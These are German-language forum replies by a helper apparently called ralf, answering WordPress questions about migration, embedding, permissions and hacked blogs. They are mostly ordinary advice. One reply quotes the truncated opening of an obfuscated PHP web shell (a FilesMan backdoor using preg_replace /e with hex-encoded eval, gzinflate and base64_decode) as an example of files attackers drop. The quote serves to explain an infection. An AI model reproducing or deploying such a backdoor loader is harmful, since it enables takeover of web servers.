Beiträge von r23


    Da ich nach der Installation von WordPress beim neuen Hoster Probleme hatte, die WXR-Datei einzuspielen (~1600 Artikel/12MB), habe ich WordPress lokal (MAMP) installiert und sie dort eingespielt. Die lokale WordPress-Installation funktioniert einwandfrei. Ich kann alle Artikel sehen und bearbeiten.

    warum wendest du dich mit den Problem nicht an deinen Hoster? Die WXR-Datei ist für den Datenaustausch wirklich super.


    Nun habe ich einen Datenbankexport (Dump) erstellt, ihn mit einem Texteditor dahingehend bearbeitet, dass alle URLs, etc. passen und ihn beim neuen Hoster per phpMyAdmin importiert. - Sieh einer an: alle Artikel da!

    verwende bei 12 MB an daten besser mysqldumper.
    Warum steht in der Anleitung
    http://www.mysqldumper.de/



    Ich kann die Artikel zum Teil nicht bearbeiten: Die (wohl noch aus tumblr-Zeiten mitgenommenen) hohen IDs werden allesamt auf die Artikel-ID 2147483647 umgeleitet


    evtl. versuchtst du den import über
    http://wordpress.org/extend/plugins/wordpress-importer/

    soweit ich mich erinnere, fängt dieses Plugin bei der id = 1 an (wenn die datenbank leer ist)

    hoffe die antwort hilft weiter

    ralf

    Link so in etwa soll das dann aussehen. und wenn ich halt auf eines der Videos klicke geht eine neue Seite auf mit dem Video, Kommentaren usw. Könnte mir einer dabei helfen

    ich habe ralativ gute erfahrungen mit jwplayer (kostenpflichtigen version) gemacht.

    Youtoube stellt umfangreiche Anleitungen zur Verfügung
    http://www.youtube.com/youtubeonyoursite
    https://developers.google.com/youtube/?hl=de-DE

    jwplayer
    http://www.longtailvideo.com/players


    cu

    ralf


    mein Blog wurde gestern gehackt. Anstelle der index wird eine gh.html Datei geladen auf dem "ghost-dz Algerian Attack DA!" steht.
    Nachdem ich diesen file gelöscht habe war der Spuk auch schon wieder weg.

    Du hast nur die gh.html gelöscht?


    Welche Lücke wird hier genutzt?

    der Angrefier hat Änderungen an deinen Scriptn durchgeführt. Hierbei ändert sich z.b. die Datei-Größe. für ein _lernen_ der Erkennung - könntest du z.b. mit FileZilla -> Ansicht -> Verzeichnisvergleich druchführen.
    Und mit winmerge in einer Windows Umgebung den Schadcode dir suchen.

    Die Suche nach der Lücke könnte schwer werden, da er vermutlich sich ein Script in dein ~/upload/ Verzeichnis legte - und eben - "notwendige" Änderungen durchführte.

    Vermutlich ist er seit Monaten auf deinem System und hat seine Spuren jetzt gelöscht und hinterlies diesen Gruß.

    Seit 2005 nervt er
    https://www.google.de/search?q=ghost-dz+Algerian+Attack+DA


    Wie kann ich das künftig verhindern?

    Wordpress richtig installieren? oder installieren lassen?


    Welche files sollte ich mir ansehen, damit nicht irgendwo eine Zeitbombe tickt?

    du kannst keiner Datei mehr trauen

    cu

    ralf

    Hallo,

    Leider kann ich keine Artikel mehr erstellen. Er öffnet zwar die entsprechende Detailseite, es erscheint aber keine WP-Headerleiste und keine Leiste zum Bearbeiten des Textes. (fett, kursiv, Format, usw.)
    http://www.rhoenrad.com/irv

    evtl. hast du in deinem Benuzer Account
    Admin => Benutzer => Dein Profil
    hier
    Persönliche Optionen
    unter
    Visueller Editor ein Häckchen - damit schlatest du den WYSIWYG-Editor aus.

    Hoffe mein Raten hilft dir weiter?

    ralf


    Wenn ich mich dann versuche auf http://de.wordpress.com/ versuche einzuloggen sagt er mir das die geannte E-mail adresse nicht mal registriert sei.

    Vermutlich bist du hier falsch? wir haben hier alle eine eigene installierte und selbst gehostete wordpress Version - und keinen Blog bei Wordpress.com

    Wordpress bietet für ihre Anwender hier Support
    http://de.support.wordpress.com/


    Oder habe ich dich falsch verstanden?

    ralf


    Nun frage ich mich, was ich tun sollte? Wie kann ich den Trojaner entfernen bzw. ist es überhaupt einer oder besteht ein anderes Problem?

    Vielen Dank für Antworten bereits im Voraus!

    Den Warnungen von AVAST kannst du sicherlich (ver)trauen. Oder du verwendest einen anderen Viren Scanner
    http://www.kaspersky.com/de/ostern_20?&…rch_oster_20_lp

    > Nun frage ich mich, was ich tun sollte?

    - Sicherheitslücke suchen oder suchen lassen (job-forum)
    - Seite in Quarantäne verschieben
    > Wie kann ich den Trojaner entfernen

    Nur durch löschen aller Daten und Dateien - du kannst keiner Datei und keinem Datensatz mehr trauen.

    Wenn alles gelöscht ist - aus vertrauensvollen Quellen das Blog neu aufsetzen (vertrauensvolle Quelle = Datensicherung, oder Dienstleister über das Jobforum)

    Viel Glück

    ralf

    Problem. ich bin kein Profi, wo finde ich eine Möglichkeit
    "schreibrechte im themes Ordner"
    einzustellen?

    Das Verzeichnis
    /srv/www/64319-pfungstadt.de/wordpress/wp-content/themes
    ist für PHP pp Wordpress leider ncht beschreibbar:

    Mit einem FTP- Probramm kannst du die Rechte für diesen Ordner/ für dieses Verzeichnis ändern.

    Evtl. überträgst du einfach dein Theme/Template nach crafty-cart?

    Viel Glück

    ralf

    Hallo,

    Seit dem 4. April 2012 läuft unser aktueller Gestaltungswettbewerb als Blog-Parade. Dabei wollen wir keine Bilder auf Papier, keine besonders originellen Fotos, keine Videos, keine Gedichte und auch keine selbst komponierten Songs.

    Wir wollen die kreativste, individuellste und schönste iPhone Hülle!

    Gefragt sind frische Kreationen für das iPhone Case von frech und witzig über skurril und schreiend bunt bis hin zu trendy, schick und stylisch. In Frage kommt einfach alles, was die iPhone Hülle attraktiver, schöner, individueller und eben besonders macht. Wie wäre es beispielsweise mit dem individuellen iPhone Abbild auf dem iPhone Case? Oder kann dein Hund telefonieren? Geht deine iPhone Hülle unter Wasser oder brennt hier die Luft? Die Ideen sind so vielseitig, wie die Nutzer der iPhones selbst. Und so bist auch du aufgerufen, deine ganz eigenen Ideen auf einer flotten iPhone Hülle umzusetzen.

    Insgesamt zehn Gewinner haben die Möglichkeit, ihr Gewinnermotiv auf das iPhone Case drucken zu lassen. Ganz ohne Kosten - eben als Gewinn.

    Wenn du mitmachen willst, bist du hier an der richtigen Stelle. Teilnahmebedingungen lesen, akzeptieren, Layout Vorlage downloaden und schon beginnt der kreative iPhone Spaß für dich und für deine Freunde. Ende der Blog-Parade ist der 23.05.2012. Also jede Menge Zeit für flotte und freche, bissige und schicke, schrille oder leise Ideen im iPhone Case Design Wettbewerb für Jedermann.

    http://blog.r23.de/pimp-your-case/

    cu

    ralf

    Welche Version verwendest du? In der Zeile 189 in
    wordpress/wp-admin/includes/file.php gibt es eingentlich keine funktion get_temp_dir


    Was kann ich tun? (bin kein Programmier-Profi).

    Wir haben hier ein Job Forum - darüber könntest du dir einen dienstleister suchen, der dir eben in deiner 'mod_fcgid:' Umgebung Wordpress installiert.

    cu

    ralf


    auf unserer Homepage [...] hat sich laut Lesern ein Virus eingeschlichen. Ich kann dies nicht bestätigen, weil ich keine Virus-Meldung bekommen.

    Ich erhalte auf deiner Seite auch eine Meldung
    http://blogrettung.de/images/copterweb.png


    Nichtdestotrotz würde ich die Homepage gerne vorläufig offline nehmen, um der Sache auf den Grund zu gehen. Könnt ihr mir sagen, wie ich dies vollziehen kann?

    Alles löschen - du kannst keiner Datei und keinem Datensatz mehr trauen.

    Wenn du diese verseuchte Version dir auf deinen Rechner holen möchtst - solltest du diesen Rechner unbedingt sichern - er kann beschädigt werden.

    Google: Website bereinigen
    http://support.google.com/webmasters/bin…e&answer=163634

    Viel Glück

    ralf


    Wie kann ich diese wieder wegbekommen?

    http://googlewebmastercentral-de.blogspot.de/2012/01/was-tun-bei-malware.html

    und

    Website bereinigen
    http://support.google.com/webmasters/bin…e&answer=163634

    1. Seite deaktivieren - damit keiner Schaden erleidet, weil deien seite besucht.

    2 .mir sehr guten PHP Kentnissen kannst du sicherlich die Sicherheitslücke suchen, finden und beseitigen. Wenn nicht - es gibt Dienstleister => Jobforum

    3. alles löschen und durch eine saubere datensicherung ohne Sicherheitslücke ersetzen.

    Viel Glück

    ralf

    Ich habe eine Seite erstellt (läuft aktuell noch lokal), in der ich (via 'Allow PHP in post and pages'-Plugin) den Befehl include("mysqldata.php") untergebracht habe. [...]
    Auf den include()-Befehl folgt:

    3: Wenn ich den Inhalt von mysqldata.php direkt (also ohne include) vor den Rest der Befehle stelle, funktioniert auch alles bestens.

    Vermutlich findet das Script die Datei nicht. evtl. versuchst du es mit einem Pfad

    PHP
    include  'c:/xampp/htdocs/wordpress/mysqldata.php';

    und da du den Pfade vermutlich bei einem Umzug ändern musst, schreibst du in deine wp-config.php

    PHP
    define('MEIN_PATH', 'c:/xampp/htdocs/wordpress');

    selbstverständlich mit deinen Daten und nicht mit dem Pfad aus dem Beispiel;)

    PHP
    include MEIN_PATH . '/mysqldata.php';


    4: Wenn ich die Seite veröffentliche, bekomme ich mehrere Fehlermeldungen, dass der include()-Befehl nich

    Es soll Personen geben, die kommen mit diesen Fehlermeldungen klar - einfach ihnen nur die erste Meldung zitieren - dann können sie dir helfen.

    cu

    ralf


    Das komische daran ist aber das mal Malware da ist und dann auf einmal kommt wieder keine Meldung. Genauso melden manche bekannte das sie eine Meldung haben und andere wieder nicht.
    http://www.paid4-world.de

    Der Schadecode wird halt über einen Zufallsgenerator angezeigt. Besonders beliebt ist zurzeit auch, teile (zufällige) Besucher, die man über Google bekomt auf andere Seiten weiterzuleiten ...

    Script Kiddies legen Dateien auf den Server z.b.

    PHP
    <?php
    $auth_pass = "88dada .... e87b21cbb4b";
    $color = "#df5";
    $default_action = 'FilesMan';
    $default_use_ajax = true;
    $default_charset = 'Windows-1251';
    preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7X1re9s2z/Dn9V usw

    oder ändern Scripte

    Dein Themes verwendet timthumb.php evtl. hast du die Warnungen nicht beachtet?
    http://www.heise.de/security/meldu…mb-1317795.html

    ist halt schon etwas älter...

    Viel Glück

    ralf

    Hallo,


    Ich habe dann ein Backup von letzter Woche eingespielt und Google um erneute Überprüfung gebeten: Die Malware war gelöscht, meine Seite wurde wieder freigegeben.

    hast du die Sicherheitslücke gesucht und geschlossen? wenn du diese nicht selber finden kannst (gute PHP Kentnisse sind erforderlich => Jobforum)



    Ich hab ein wenig Sorge um mein (gutes) Ranking... Ausserdem gehen mir da durch sicherlich auch Leads/Anfragen verloren.

    jeder deiner Besucher wird von *Google und weiteren* vor deiner Seite gewarnt - wer sollte dann noch Anfragen stellen? würdest du bei einer Warnung vor der Seite diese Warnung umgehen und dann dort etwas "anfodern"?


    Für schnelle Antworten und Hilfen bin ich sehr dankbar!

    Es gibt Dienstleister, die WebAnwendungen absichern können. Einige Provider haben auch einen Supportbereich, die Wordpress absichert. Und es gibt saas Anbieter, die Ihren Kunden Sicherheit bieten.

    Und dann gibt es Werkzeuge, die Webanwendungen auf Malware prüfen und den Inhaber informieren... es gibt jetzt auch Gütesigel.. kommt halt darauf an, wieviel Geld man inverstieren möchte - oder kann.

    Viel Glück

    ralf